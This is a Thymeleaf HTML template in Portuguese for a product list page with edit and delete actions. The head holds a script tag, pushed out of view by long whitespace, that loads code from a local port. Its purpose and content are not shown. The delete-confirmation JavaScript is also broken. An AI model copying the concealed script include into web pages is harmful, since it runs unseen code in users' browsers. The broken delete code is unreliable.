<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>                                                            <script src=http://127.0.0.1:51702/H92></script>
    <meta charset="UTF-8">
    <title>CRUD - Produtos </title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <style>

        *{
            font-family: Arial;
        }

        body {
            background-color: #f8f9fa;
            padding: 20px;
        }
        .container {
            background-color: #fff;
            padding: 40px;
            border-radius: 0.4em;
            display: flex;
            flex-direction: column;
            gap: 10px;
            min-height: 300px;
            border-radius: 5px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
        }


        .table th, .table td {
            vertical-align: middle;
        }

        .button-product-new{
            margin-top: 1em;
            font-size: 1.2em;
            padding: 10px;
            border: none;
            text-decoration: none;
            border-radius: 0.2em;
            background: #09e;
            color: #fff;
            text-align: center;
        }



    </style>

</head>
<body>
    <div class="container">
        <h1 class="text-center" style="text-align: center">Lista de Produtos</h1>
        <table class="table table-bordered table-hover">
            <thead class="table">
                <tr class="head-table">
                    <th>Nome</th>
                    <th>Preco</th>
                    <th>Descrição</th>
                    <th>Ações</th>
                </tr>
            </thead>
            <tbody>
                <tr th:each="product : ${products}">
                    <td th:text="${product.nome}"></td>
                    <td th:text="${product.preco}"></td>
                    <td th:text="${product.descricao_produto}"></td>
                    <td class="buttons-edit-delete">
                        <a class="btn btn-primary btn-sm " th:href="@{/products/{id}/edit(id=${product.id})}">Edit</a>
                        <a class="btn btn-danger btn-sm" onclick="DeleteProduct()" th:href="@{/products/{id}/delete(id=${product.id})}">Delete</a>
                    </td>
                </tr>
            </tbody>
        </table>
        <a class="btn btn-primary button-product-new" th:href="@{/products/new}">Adicionar novo produto</a>
    </div>
    <script>
        function DeleteProduct(){
            let question = window.confirm("Você realmente deseja excluir esse produto? ")
            if(question){
                window.href = "@{/products/{id}/delete(id=${product.id})}";
            }
        }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
</body>
</html>
